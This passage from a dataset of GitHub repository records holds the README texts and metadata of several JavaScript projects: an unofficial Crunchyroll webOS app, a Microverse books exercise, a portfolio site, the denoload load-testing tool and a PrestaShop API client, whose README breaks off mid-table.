with me on SaaS projects. * [William PIERRE](https://www.linkedin.com/in/william-pierre-879020153/) for his outstanding work in managing and acquiring new clients, and for his contributions to the business side of the project. Contact me on [Twitter](https://twitter.com/zayed_charef) or email me at zayed.charef@gmail.com if you have any questions.
A TikTok live streaming SaaS project featuring scalable architecture, dynamic widgets, and user customization, utilizing TikTok Live Connector and Express.js.
express-js,javascript,pug,saas,tiktok,tiktok-api
2023-05-05T19:49:01Z
2023-05-05T22:59:26Z
null
1
0
5
0
0
8
null
null
JavaScript
ediaz23/crunchyroll-webos-stream
master
# Crunchyroll App for LG Smart TVs *Crunchyroll&trade; is a registered trademark of the Sony Pictures Entertainment Inc.\ This project is not affiliated with Crunchyroll, Team Crunchyroll, or the Sony Pictures Entertainment Inc.* ## About This is an unofficial app for LG smart TVs that allows you to watch Crunchyroll,\ a popular anime streaming service. ## Warning This project is not affiliated with or endorsed by Crunchyroll. The use of this project may violate the terms of service between you and stream provider. Use with caution and at your own risk. ## Disclaimer This software is intended for personal use only. Do not use it for illegal purposes, such as downloading copyrighted content without permission. We do not condone or support piracy, and any misuse of this software is not the responsibility of the project contributors or maintainers. ## How to run on local? (Linux) 1) Install git, node and npm. I use node version v16.17.0 and npm version 8.15.0 (google it), example: ```bash sudo apt install git sudo apt install nodejs sudo apt install npm ``` >Note: Node 16 or greater required. 2) Install enact client (version 6.1.1): ```bash npm install -g @enact/cli ``` 3) Create a new folder or go to where you want to download source code, example: ```bash mkdir ~/webos-crunchy-test cd ~/webos-crunchy-test ``` 4) Download necessary source code from github, example: ```bash git clone https://github.com/ediaz23/crunchyroll-webos-stream --recursive --single-branch --branch=master --depth 3 git clone https://github.com/ediaz23/crunchyroll-webos-service --single-branch --branch=master --depth 3 git clone https://github.com/ediaz23/crunchyroll-webos-server --single-branch --branch=master --depth 3 ``` 5) Run npm install for each project. ```bash cd crunchyroll-webos-stream && npm install && cd .. cd crunchyroll-webos-service && npm install && cd .. cd crunchyroll-webos-server && npm install && cd .. ``` 6) In one terminal run server: ```bash cd crunchyroll-webos-server && npm run play ``` 7) In other terminal run front-end: ```bash cd ~/webos-crunchy-test/crunchyroll-webos-stream && npm run serve ``` 8) Should run in any browser disabling cors, but my setup is chromium_81.0.4044.92_1.vaapi_linux.tar with next command: ```bash ~/webOS_TV_SDK/chrome-linux/chrome \ --user-data-dir=$HOME/webOS_TV_SDK/chrome-linux/tmp_chrome \ --disable-site-isolation-trials \ --allow-file-access-from-files \ --disable-web-security \ --enable-remote-extensions \ --enable-blink-features=ShadowDOMV0,CustomElementsV0 ``` 9) You can load mock data editing src/const.js ## How to create local package? (Linux) 6) Follow previously 5 steps and run build-dev for development or build-p for production, and app will be created in ~/webos-crunchy-test/crunchyroll-webos-stream/bin: ```bash cd ~/webos-crunchy-test/crunchyroll-webos-stream && npm run build-dev ``` ## Help Control back event. ``` window.dispatchEvent(new KeyboardEvent('keydown', { 'keyCode': 461 })) ``` ## Create a Dash file ```bash x264 --output intermediate.264 --fps 24 --preset slow --bitrate 2400 --vbv-maxrate 4800 --vbv-bufsize 9600 --min-keyint 48 --keyint 48 --scenecut 0 --no-scenecut --pass 1 --video-filter "resize:width=1280,height=720" inputvideo.mkv MP4Box -add intermediate.264 -fps 24 output_2400k.mp4 MP4Box -dash 4000 -frag 4000 -rap -segment-name kimi_z_video_segment_ output_2400k.mp4 MP4Box -dash 4000 -frag 4000 -rap -segment-name kimi_z_audio_segment_ output_2400k.mp4#audio Copy all video.mpd and only Adaptation from audio.mpd ``` ## Create a m3u8 file ```bash ffmpeg -i kimi.mp4 -threads 16 -c:v libx264 -c:a aac -b:v 1M -b:a 128k -flags +cgop -g 30 -hls_time 4 -hls_playlist_type vod -hls_segment_filename 'output_%03d.ts' -sn -f hls kimi.m3u8 ``` ## Extrac image from bif file ```bash ffmpeg -i archivo.bif imagen-%04d.png ``` ## Create bif file from video ```bash ffmpeg -i video.mp4 -threads 16 -vf "fps=8/60,scale=320:179" -vsync 0 -f image2 imagen-%04d.jpg ``` ## ⚖ License This project is released under [Apache 2.0 License](LICENSE)
Unofficial Crunchyroll app for LG Smart TVs, allowing users to browse and stream anime directly on their TV. Built with Enact library and WebOS SDK. This app is not owned or endorsed by Crunchyroll or LG or Sony.
anime,enactjs,javascript,lg,react,reactjs,smart-tv,webos,webos-application,webos-tv
2023-05-01T20:51:23Z
2024-05-19T21:46:51Z
2024-05-19T21:23:22Z
1
0
242
0
0
8
null
Apache-2.0
JavaScript
Benawi/Microverse-Awesome-books
master
<a name="readme-top"></a> ### <div align="center"><a href="#"><img src="https://github.com/Benawi/Benawi/assets/21217148/de823737-5f7f-4de8-b62e-3fe88c238eab"/></a></div> # 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [🚀 Live Demo](#live-demo) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#triangular_flag_on_post-deployment) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [❓ FAQ (OPTIONAL)](#faq) - [📝 License](#license) # 📖 Awesome Books Microverse! Project <a name="about-project"></a> Awesome Books Microverse! project is a repository consisting of the following files: - HTML file - CSS file - JS files - Html,CSS and JS linters file The repository also contains files for setting up linters and validators. ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> <ul> <li><a href="https://microverse.notion.site/HTML-CSS-Get-a-head-start-275eb85fd34b4416aa06ec635d69cdaf">HTML</a></li> <li><a href="https://microverse.notion.site/HTML-CSS-Get-a-head-start-275eb85fd34b4416aa06ec635d69cdaf">CSS</a></li> <li><a href="https://microverse.notion.site/HTML-CSS-Get-a-head-start-275eb85fd34b4416aa06ec635d69cdaf">JS</a></li> </ul> ### Key Features <a name="key-features"></a> ## Awesome Books - [HTML/CSS & JavaScript Awesome Books project](https://github.com/microverseinc/curriculum-javascript/blob/main/books/m2_plain_js_classes_v1_1.md) ### Features Added: - Create a collection that keeps a list of books - Create a function to add a new book to the collection, with title and author - Create a function to remove a book from the collection - Display all books saved in the collection in the top part of the page. - When a user clicks the "Add" button: - A new book is added to the collection. - The new book is displayed in the page. - When a user clicks the "Remove" button: - The correct book is removed from the collection. - The correct book dissapears from the page. - Data is preserved in the browser's memory by using localStorage. - JavaScript classes used instead of objects and arrays. - Class methods created to add and remove books. - A Navigation bar section added . - A footer section added - The Navigation bar contains Three content sections: - Books list. - Add book form. - Contact info. - CSS styles Added to the application to make it match [this](https://github.com/microverseinc/curriculum-javascript/blob/main/books/images/awesome_books_full_website.png) wireframe. - When a user clicks on any of the links, the main area changes to display only one of the three content sections which clicked. - To change the contents of the page, plain JavaScript and CSS used. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🚀 Live Demo <a name="live-demo"></a> - [Live Demo](https://benawi.github.io/Microverse-Awesome-books/) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 💻 Getting Started <a name="getting-started"></a> To get a local copy up and running, follow these steps. ### Setup Clone this repository to your desired folder: > cd my-folder > git clone git@github.com:myaccount/my-project.git ### Prerequisites In order to run this project you need: - gitHub account; - git installed on your OS. ### Install > https://github.com/microverseinc/linters-config/tree/master/html-css-js - Installations required to run this project: ### Webhint installation. - Run the following command: > npm install --save-dev hint@7.x ### Stylelint installation. - Run the following command: > npm install --save-dev stylelint@13.x stylelint-scss@3.x stylelint-config-standard@21.x stylelint-csstree-validator@1.x ### ESLint - Run > npm install --save-dev eslint@7.x eslint-config-airbnb-base@14.x eslint-plugin-import@2.x babel-eslint@10.x ### Usage You can use this project by cloning it to your folder and changing index.html and styles.css files. ### Run tests To run tests, run the following commands: To track linter errors locally follow these steps: Download all the dependencies run: ``` npm install ``` Track HTML linter errors run: ``` npx hint . ``` Track CSS linter errors run: ``` npx stylelint "**/*.{css,scss}" ``` Track JavaScript linter errors run: ``` npx eslint ." ``` ### Deployment You can redeploy this project by adding new lines of code to source files. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 👥 Authors <a name="authors"></a> ### 👤 Habtamu Alemayehu - GitHub: [@bena](https://github.com/Benawi) ### 👤 Jubaer hossain maruf - GitHub:[jubaer919] (https://github.com/jubaer919) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🔭 Future Features <a name="future-features"></a> Awesome books: a complete website with navigation[this](https://github.com/microverseinc/curriculum-javascript/blob/main/books/m4_full_website_v1_1.md) will be added. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! <p align="right">(<a href="#readme-top">back to top</a>)</p> ## ⭐️ Show your support <a name="support"></a> Give me ⭐️ If you like this project! <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🙏 Acknowledgments <a name="acknowledgements"></a> - I would like to thank Microverse program for providing me this great chance. <p align="right">(<a href="#readme-top">back to top</a>)</p> <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 📝 License <a name="license"></a> This project is [MIT](./MIT.md) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
Awesome Books is a single page application for managing your book collection online. Users can add and personalize lists of books to store in one place on this website. Featuring SPA technology, Awesome Books gives users seamless access to track.
css-flexbox,html5,javascript,linter-eslint
2023-05-01T07:55:12Z
2023-06-22T00:58:16Z
null
2
3
76
1
0
8
null
null
JavaScript
haidar038/haidar038.github.io
main
# Portfolio Website This is a personal portfolio website showcasing my skills, projects, and experiences as a web developer & graphic designer. ## Technologies Used The website is built using HTML, CSS, and JavaScript. It also utilizes the following libraries and frameworks: - HTML & CSS - Vanilla JS ## Deployment The website is deployed using GitHub Pages and can be accessed at https://khaidar.me ## Features The website has the following features: - A responsive design that adapts to different screen sizes - A floating navigation bar - Sections for my skills, projects, and experiences, with clickable cards that display more information on hover or click - A contact section with a form that allows visitors to send me a message - An about section with a brief introduction and a downloadable resume ## Credits The design and content of the website were created by me, with inspiration from various portfolio websites I found online. ## License This project is licensed under the MIT License. See LICENSE.md for details.
Portfolio Website
css,html,html-css-javascript,javascript,js,portfolio,portfolio-site,portfolio-website
2023-05-07T12:25:03Z
2024-05-13T05:13:44Z
null
1
0
38
0
0
8
null
MIT
HTML
denoload/denoload
master
![denoload sauropod](./.github/images/sauropod.png) # 🦕 `denoload` - Accelerate web API load testing with seamless client library integration. ![denoload ascii art](./.github/images/ascii.png) `denoload` is a versatile load testing tool engineered to simplify the load testing of web services and similar backend components. It seamlessly integrate with client libraries, empowering developers to create robust load tests in just minutes. With `denoload`, you can verify the performance of your web services under real-world conditions, all while enjoying a straightforward and efficient testing process. It is strongly inspired by [k6][k6]. ## Why ? [k6][k6] is a great tool but it's lacking of libraries and community due to its custom JavaScript VM and API. Worse, there are edge cases where the VM isn't standard and can not be. This can lead to a **lot** frustration. `denoload` aims to be an alternative with: - great performance (comparable to [k6][k6]) - write [k6][k6] like scripts with VUs, iterations and executors - standard web APIs support (e.g. [fetch](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API)) - ESModules support - Modern JavaScript & TypeScript support out of the box (including `async` / `await`) This project is based on [Bun][bun]. ## Example script ```ts import { faker } from "@faker-js/faker"; import { GoTrueClient } from "@supabase/gotrue-js"; import { globalRegistry } from "@negrel/denoload-metrics"; import expect from "expect"; export const options = { scenarios: { perVuIter: { executor: "per-vu-iterations", vus: 256, iterations: 10, }, }, }; const AuthClient = new GoTrueClient({ url: "http://gotrue.local" }); const signUpCounter = globalRegistry.Counter("signup"); const signOutCounter = globalRegistry.Counter("signout"); export default async function (): Promise<void> { // Sign up and sign in. { const { data, error } = await AuthClient.signUp({ email: faker.internet.email(), password: faker.internet.password(), }); expect(error).toBeNull(); expect(data).not.toBeNull(); signUpCounter.add(1); } await Bun.sleep(1000); // Interact with your API... // Sign out. { const { error } = await AuthClient.signOut(); expect(error).toBeNull(); signOutCounter.add(1); } } ``` See [examples/gotrue](./examples/gotrue/) to run the script locally. ## TODOs Executors: - [x] Per VU iterations - [x] Shared iterations - [x] Constant VUs - [ ] Ramping VUs - [ ] Constant Arrival Rate - [ ] Ramping Arrival Rate ## Why `denoload` ? The project was originally based on the [Deno](https://deno.land) runtime but I switched to [Bun][bun] for VU [isolation using ShadowRealm](https://github.com/tc39/proposal-shadowrealm/). ## Contributing If you want to contribute to `denoload` to add a feature or improve the code contact me at [negrel.dev@protonmail.com](mailto:negrel.dev@protonmail.com), open an [issue](https://github.com/negrel/denoload/issues) or make a [pull request](https://github.com/negrel/denoload/pulls). ## :stars: Show your support Please give a :star: if this project helped you! [![buy me a coffee](.github/images/bmc-button.png)](https://www.buymeacoffee.com/negrel) ## :scroll: License MIT © [Alexandre Negrel](https://www.negrel.dev/) [k6]: https://k6.io/ [bun]: https://bun.sh/
Modern load testing tool using JavaScript and TypeScript, inspired by k6.
k6,benchmark,javascript,typescript,bun
2023-05-05T19:03:55Z
2024-01-27T12:02:18Z
2023-12-09T21:18:58Z
1
0
116
0
0
8
null
MIT
TypeScript
KasualBusiness/prestashop-api
main
# prestashop-api Simplified and typed calls to Prestashop webservices. Access all endpoints offered by Prestashop webservices as well as custom routes added by addons. ## Installation ```bash npm install @kasual-business/prestashop-api ``` ## Usage/Examples #### Initialize the connection You only need to initialize the api url and api key once. ```javascript import { init } from "@kasual-business/prestashop-api"; // Init the api url and api key init("https://my-prestashop.com", "my-api-key"); ``` #### Use ```javascript import prestashopAPI, { products } from "@kasual-business/prestashop-api"; await prestashopAPI.products.list(); // or await products.list(); ``` #### List ```javascript // List all products await products.list(); // Precise custom type interface CustomProduct extends Product { custom_key_from_addon: string; } await products.list<CustomProduct>(); ``` #### Filter on name with exact match ```javascript // List all products having 1 as id_supplier await products.list({ filters: [{ key: "id_supplier", value: 1 }], }); ``` #### Filter on name with containing operator ```javascript // List all products containing "orange" in name await products.list({ filters: [{ key: "name", value: "orange", operator: "contains" }], }); ``` #### Sort ```javascript // List all products and sort on id DESC await products.list({ sort: ["id_DESC"], }); ``` #### Display ```javascript // List all products and display only id and name await products.list({ display: ["id", "name"], }); ``` #### Pagination ```javascript // List all products and use skip and limit to paginate await products.list({ skip: 0, limit: 10, }); ``` #### Find It works like list except it only returns the first item of the list. This can be useful when searching by EAN13, for example. It avoids having to manipulate the returned array in order to obtain the first element. ```javascript // Returns the first product await products.find(); // Returns the first product having his ean13 equals to 123 await products.find({ filters: [{ key: "ean13", value: "123" }], }); ``` #### Create ```javascript // Create a product await products.create({ name: "name", // ...rest of the mandatory values }); // Create a product with multiple languages await products.create({ name: [ { id: 1, value: "My Name 1" }, { id: 2, value: "My Name 2" }, ], // ...rest of the mandatory values }); ``` #### Update ```javascript // Update product with id 1 await products.update(1, { name: "new name", }); // Update the name of product with id 1 with multiple languages await products.update(1, { name: [ { id: 1, value: "My Name 1" }, { id: 2, value: "My Name 2" }, ], }); // Update the name and the reference await products.update(1, { name: [ { id: 1, value: "My Name 1" }, { id: 2, value: "My Name 2" }, ], reference: "my-ref", }); ``` #### Delete ```javascript // Delete product with id 1 await products.delete(1); ``` #### Custom calls If you have an addon that add additional routes to prestashop's webservices, you can call them like this: ```javascript // list await custom<{ items: Item[] }>("my-custom-route").list(); // get await custom<{ item: Item }>("my-custom-route").get(1); // create await custom<{ item: Item }>("my-custom-route").create<{ name: string }>({ name: "My name" }); // update await custom<{ item: Item }>("my-custom-route").update<{ name: string }>(1, { name: "My new name" }); // delete await custom<{ item: Item }>("my-custom-route").delete(1); // list with custom query params const searchParams = new URLSearchParams(); searchParams.append('myCustomId', '1'); await custom<{ items: Item[] }>('my-custom-route').list({ customSearchParams: searchParams, }); // send body as json instead of xml await custom<{ item: Item }>("my-custom-route").create<{ name: string }>({ name: "My name" }, { json: true }); await custom<{ item: Item }>("my-custom-route").update<{ name: string }>(1, { name: "My new name" }, { json: true }); ``` ## API Reference ### ListParams | Name | Value | Description | | :-------- | :------------------------------------------------------------ | :--------------------------------------- | | `display` | 'full' or string[] | Display specific keys | | `filters` | {key: string; value: string OR number, operator?: Operator}[] | Filter on one or many params | | `limit` | number | Limit the number of items | | `skip` | number | Skip to the index (should specify limit) | | `sort` | (`${string}_ASC` OR `${string}_DESC`)[] | Sort ASC or DESC on one several keys | Note: In order to do an OR operator while filtering on a key, just append the same key multiple times. ```javascript import { products } from "@kasual-business/prestashop-api"; const listProducts = async () => { const response = await products.list({ filters: [ { key: "id", value: 1 }, { key: "id", value: 2 }, ], }); }; ``` ### GetParams | Name | Value | Description | | :-------- | :----------------- | :-------------------- | | `display` | 'full' or string[] | Display specific keys | ### PostParams | Name | Value | Description | | :-------- | :----------------- | :-------------------- | | `display` | 'full' or string[] | Display specific keys | ### PutParams | Name | Value | Description | | :-------------- | :----------------- | :------------------------ | | `display` | 'full' or string[] | Display specific keys | | `keysToExclude` | string[] | Keys to exclude from body | ### CustomParams | Name | Value | Description | | :-------- | :----------------- | :-------------------- | | `display` | 'full' or string[] | Display specific keys | ### CustomGetParams | Name | Value | Description | | :------------------- | :----------------- | :----------------------- | | `display` | 'full' or string[] | Display specific keys | | `customSearchParams` | URLSearchParams | Add custom search params | ### Operator Operator can be `'start'`, `'end'`, `'contains'` and `'strict'`. ### References #### addresses | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all addresses | | `find` | ListParams | Find the first address | | `get` | id, GetParams | Get an address by id | | `create` | body, PostParams | Create an address | | `update` | id, body, PutParams | Update an address by id | | `delete` | id, DeleteParams | Delete an address by id | #### attachments | Name | Parameters | Description | | :------- | :------------------ | :------------------------- | | `list` | ListParams | List all attachments | | `find` | ListParams | Find the first attachment | | `get` | id, GetParams | Get an attachment by id | | `create` | body, PostParams | Create an attachment | | `update` | id, body, PutParams | Update an attachment by id | | `delete` | id, DeleteParams | Delete an attachment by id | #### carriers | Name | Parameters | Description | | :------- | :------------------ | :--------------------- | | `list` | ListParams | List all carriers | | `find` | ListParams | Find the first carrier | | `get` | id, GetParams | Get a carrier by id | | `create` | body, PostParams | Create a carrier | | `update` | id, body, PutParams | Update a carrier by id | | `delete` | id, DeleteParams | Delete a carrier by id | #### cartRules | Name | Parameters | Description | | :------- | :------------------ | :----------------------- | | `list` | ListParams | List all cart rules | | `find` | ListParams | Find the first rule | | `get` | id, GetParams | Get a cart rule by id | | `create` | body, PostParams | Create a cart rule | | `update` | id, body, PutParams | Update a cart rule by id | | `delete` | id, DeleteParams | Delete a cart rule by id | #### carts | Name | Parameters | Description | | :------- | :------------------ | :------------------ | | `list` | ListParams | List all carts | | `find` | ListParams | Find the first cart | | `get` | id, GetParams | Get a cart by id | | `create` | body, PostParams | Create a cart | | `update` | id, body, PutParams | Update a cart by id | | `delete` | id, DeleteParams | Delete a cart by id | #### categories | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all categories | | `find` | ListParams | Find the first category | | `get` | id, GetParams | Get a category by id | | `create` | body, PostParams | Create a category | | `update` | id, body, PutParams | Update a category by id | | `delete` | id, DeleteParams | Delete a category by id | #### combinations | Name | Parameters | Description | | :------- | :------------------ | :------------------------- | | `list` | ListParams | List all combinations | | `find` | ListParams | Find the first combination | | `get` | id, GetParams | Get a combination by id | | `create` | body, PostParams | Create a combination | | `update` | id, body, PutParams | Update a combination by id | | `delete` | id, DeleteParams | Delete a combination by id | #### configurations | Name | Parameters | Description | | :------- | :------------------ | :--------------------------- | | `list` | ListParams | List all configurations | | `find` | ListParams | Find the first configuration | | `get` | id, GetParams | Get a configuration by id | | `create` | body, PostParams | Create a configuration | | `update` | id, body, PutParams | Update a configuration by id | | `delete` | id, DeleteParams | Delete a configuration by id | #### contacts | Name | Parameters | Description | | :------- | :------------------ | :--------------------- | | `list` | ListParams | List all contacts | | `find` | ListParams | Find the first contact | | `get` | id, GetParams | Get a contact by id | | `create` | body, PostParams | Create a contact | | `update` | id, body, PutParams | Update a contact by id | | `delete` | id, DeleteParams | Delete a contact by id | #### contentManagementSystem | Name | Parameters | Description | | :------- | :------------------ | :------------------------------------ | | `list` | ListParams | List all content management systems | | `find` | ListParams | Find the first management sytem | | `get` | id, GetParams | Get a content management system by id | | `create` | body, PostParams | Create a content | | `update` | id, body, PutParams | Update a content by id | | `delete` | id, DeleteParams | Delete a content by id | #### countries | Name | Parameters | Description | | :------- | :------------------ | :--------------------- | | `list` | ListParams | List all countries | | `find` | ListParams | Find the first country | | `get` | id, GetParams | Get a country by id | | `create` | body, PostParams | Create a country | | `update` | id, body, PutParams | Update a country by id | | `delete` | id, DeleteParams | Delete a country by id | #### currencies | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all currencies | | `find` | ListParams | Find the first currency | | `get` | id, GetParams | Get a currency by id | | `create` | body, PostParams | Create a currency | | `update` | id, body, PutParams | Update a currency by id | | `delete` | id, DeleteParams | Delete a currency by id | #### customerMessages | Name | Parameters | Description | | :------- | :------------------ | :------------------------------ | | `list` | ListParams | List all customer messages | | `find` | ListParams | Find the first customer message | | `get` | id, GetParams | Get a customer message by id | | `create` | body, PostParams | Create a customer message | | `update` | id, body, PutParams | Update a customer message by id | | `delete` | id, DeleteParams | Delete a customer message by id | #### customerThreads | Name | Parameters | Description | | :------- | :------------------ | :----------------------------- | | `list` | ListParams | List all customer threads | | `find` | ListParams | Find the first customer thread | | `get` | id, GetParams | Get a customer thread by id | | `create` | body, PostParams | Create a customer thread | | `update` | id, body, PutParams | Update a customer thread by id | | `delete` | id, DeleteParams | Delete a customer thread by id | #### customers | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all customers | | `find` | ListParams | Find the first customer | | `get` | id | Get a customer by id | | `create` | body, PostParams | Create a customer | | `update` | id, body, PutParams | Update a customer by id | | `delete` | id, DeleteParams | Delete a customer by id | #### customizations | Name | Parameters | Description | | :------- | :------------------ | :--------------------------- | | `list` | ListParams | List all customizations | | `find` | ListParams | Find the first customization | | `get` | id, GetParams | Get a customization by id | | `create` | body, PostParams | Create a customization | | `update` | id, body, PutParams | Update a customization by id | | `delete` | id, DeleteParams | Delete a customization by id | #### deliveries | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all deliveries | | `find` | ListParams | Find the first delivery | | `get` | id, GetParams | Get a delivery by id | | `create` | body, PostParams | Create a delivery | | `update` | id, body, PutParams | Update a delivery by id | | `delete` | id, DeleteParams | Delete a delivery by id | #### employees | Name | Parameters | Description | | :------- | :------------------ | :----------------------- | | `list` | ListParams | List all employees | | `find` | ListParams | Find the first employee | | `get` | id, GetParams | Get an employee by id | | `create` | body, PostParams | Create an employee | | `update` | id, body, PutParams | Update an employee by id | | `delete` | id, DeleteParams | Delete an employee by id | #### groups | Name | Parameters | Description | | :------- | :------------------ | :------------------- | | `list` | ListParams | List all groups | | `find` | ListParams | Find the first group | | `get` | id, GetParams | Get a group by id | | `create` | body, PostParams | Create a group | | `update` | id, body, PutParams | Update a group by id | | `delete` | id, DeleteParams | Delete a group by id | #### guests | Name | Parameters | Description | | :------- | :------------------ | :------------------- | | `list` | ListParams | List all guests | | `find` | ListParams | Find the first guest | | `get` | id, GetParams | Get a guest by id | | `create` | body, PostParams | Create a guest | | `update` | id, body, PutParams | Update a guest by id | | `delete` | id, DeleteParams | Delete a guest by id | #### imageTypes | Name | Parameters | Description | | :------- | :------------------ | :------------------------- | | `list` | ListParams | List all image types | | `find` | ListParams | Find the first image type | | `get` | id, GetParams | Get an image type by id | | `create` | body, PostParams | Create an image type | | `update` | id, body, PutParams | Update an image type by id | | `delete` | id, DeleteParams | Delete an image type by id | #### images | Name | Parameters | Description | | :------- | :------------------------------------------ | :-------------- | | `create` | ImageTypeRoute, productId, buffer, filename | Create an image | | `get` | ImageTypeRoute, productId, path | Get an image | #### languages | Name | Parameters | Description | | :------- | :------------------ | :---------------------- | | `list` | ListParams | List all languages | | `find` | ListParams | Find the first language | | `get` | id, GetParams | Get a language by id | | `create` | body, PostParams | Create a language | | `update` | id, body, PutParams | Update a language by id | | `delete` | id, DeleteParams | Delete a language by id | #### manufacturers | Name | Parameters | Description | | :------- | :------------------ | :-------------------------- | | `list` | ListParams | List all manufacturers | | `find` | ListParams | Find the first manufacturer | | `get` | id, GetParams | Get a manufacturer by id | | `create` | body, PostParams | Create a manufacturer | | `update` | id, body, PutParams | Update a manufacturer by id | | `delete` | id, DeleteParams | Delete a manufacturer by id | #### messages | Name | Parameters | Description | | :------- | :------------------ | :--------------------- | | `list` | ListParams | List all messages | | `find` | ListParams | Find the first message | | `get` | id, GetParams | Get a message by id | | `create` | body, PostParams | Create a message | | `update` | id, body, PutParams | Update a message by id | | `delete` | id, DeleteParams | Delete a message by id | #### orderCarriers | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all order carriers | | `find` | ListParams | Find the first order carrier | | `get` | id, GetParams | Get an order carrier by id | | `create` | body, PostParams | Create an order carrier | | `update` | id, body, PutParams | Update an order carrier by id | | `delete` | id, DeleteParams | Delete an order carrier by id | #### orderCartRules | Name | Parameters | Description | | :------- | :------------------ | :------------------------------ | | `list` | ListParams | List all order cart rules | | `find` | ListParams | Find the first order cart rule | | `get` | id, GetParams | Get an order cart rule by id | | `create` | body, PostParams | Create an order cart rule | | `update` | id, body, PutParams | Update an order cart rule by id | | `delete` | id, DeleteParams | Delete an order cart rule by id | #### orderDetails | Name | Parameters | Description | | :------- | :------------------ | :--------------------------- | | `list` | ListParams | List all order details | | `find` | ListParams | Find the first order detail | | `get` | id, GetParams | Get an order detail by id | | `create` | body, PostParams | Create an order detail | | `update` | id, body, PutParams | Update an order detail by id | | `delete` | id, DeleteParams | Delete an order detail by id | #### orderHistories | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all order histories | | `find` | ListParams | Find the first order history | | `get` | id, GetParams | Get an order history by id | | `create` | body, PostParams | Create an order history | | `update` | id, body, PutParams | Update an order history by id | | `delete` | id, DeleteParams | Delete an order history by id | #### orderInvoices | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all order invoices | | `find` | ListParams | Find the first order invoice | | `get` | id, GetParams | Get an order invoice by id | | `create` | body, PostParams | Create an order invoice | | `update` | id, body, PutParams | Update an order invoice by id | | `delete` | id, DeleteParams | Delete an order invoice by id | #### orderPayments | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all order payments | | `find` | ListParams | Find the first order payment | | `get` | id, GetParams | Get an order payment by id | | `create` | body, PostParams | Create an order payment | | `update` | id, body, PutParams | Update an order payment by id | | `delete` | id, DeleteParams | Delete an order payment by id | #### orderSlip | Name | Parameters | Description | | :------- | :------------------ | :------------------------- | | `list` | ListParams | List all order slips | | `find` | ListParams | Find the first order slip | | `get` | id, GetParams | Get an order slip by id | | `create` | body, PostParams | Create an order slip | | `update` | id, body, PutParams | Update an order slip by id | | `delete` | id, DeleteParams | Delete an order slip by id | #### orderStates | Name | Parameters | Description | | :------- | :------------------ | :-------------------------- | | `list` | ListParams | List all order states | | `find` | ListParams | Find the first order state | | `get` | id, GetParams | Get an order state by id | | `create` | body, PostParams | Create an order state | | `update` | id, body, PutParams | Update an order state by id | | `delete` | id, DeleteParams | Delete an order state by id | #### orders | Name | Parameters | Description | | :------- | :------------------ | :-------------------- | | `list` | ListParams | List all orders | | `find` | ListParams | Find the first order | | `get` | id, GetParams | Get an order by id | | `create` | body, PostParams | Create an order | | `update` | id, body, PutParams | Update an order by id | | `delete` | id, DeleteParams | Delete an order by id | #### priceRanges | Name | Parameters | Description | | :------- | :------------------ | :------------------------- | | `list` | ListParams | List all price ranges | | `find` | ListParams | Find the first price range | | `get` | id, GetParams | Get a price range by id | | `create` | body, PostParams | Create a price range | | `update` | id, body, PutParams | Update a price range by id | | `delete` | id, DeleteParams | Delete a price range by id | #### productCustomizationFields | Name | Parameters | Description | | :------- | :------------------ | :----------------------------------------- | | `list` | ListParams | List all product customization fields | | `find` | ListParams | Find the first product customization field | | `get` | id, GetParams | Get a product customization field by id | | `create` | body, PostParams | Create a product customization field | | `update` | id, body, PutParams | Update a product customization field by id | | `delete` | id, DeleteParams | Delete a product customization field by id | #### productFeatureValues | Name | Parameters | Description | | :------- | :------------------ | :----------------------------------- | | `list` | ListParams | List all product feature values | | `find` | ListParams | Find the first product feature value | | `get` | id, GetParams | Get a product feature value by id | | `create` | body, PostParams | Create a product feature value | | `update` | id, body, PutParams | Update a product feature value by id | | `delete` | id, DeleteParams | Delete a product feature value by id | #### productFeatures | Name | Parameters | Description | | :------- | :------------------ | :----------------------------------- | | `list` | ListParams | List all product features fields | | `find` | ListParams | Find the first product feature field | | `get` | id, GetParams | Get a product feature by id | | `create` | body, PostParams | Create a product feature | | `update` | id, body, PutParams | Update a product feature by id | | `delete` | id, DeleteParams | Delete a product feature by id | #### productOptionValues | Name | Parameters | Description | | :------- | :------------------ | :---------------------------------- | | `list` | ListParams | List all product option values | | `find` | ListParams | Find the first product option value | | `get` | id, GetParams | Get a product option value by id | | `create` | body, PostParams | Create a product option value | | `update` | id, body, PutParams | Update a product option value by id | | `delete` | id, DeleteParams | Delete a product option value by id | #### productOptions | Name | Parameters | Description | | :------- | :------------------ | :---------------------------- | | `list` | ListParams | List all product options | | `find` | ListParams | Find the first product option | | `get` | id, GetParams | Get a product option by id | | `create` | body, PostParams | Create a product option | | `update` | id, body, PutParams | Update a product option by id | | `delete` | id, DeleteParams | Delete a product option by id | #### productSuppliers | Name | Parameters | Description | | :------- | :------------------ | :------------------------------ | | `list` | ListParams | List all product suppliers | | `find` | ListParams | Find the first product supplier | 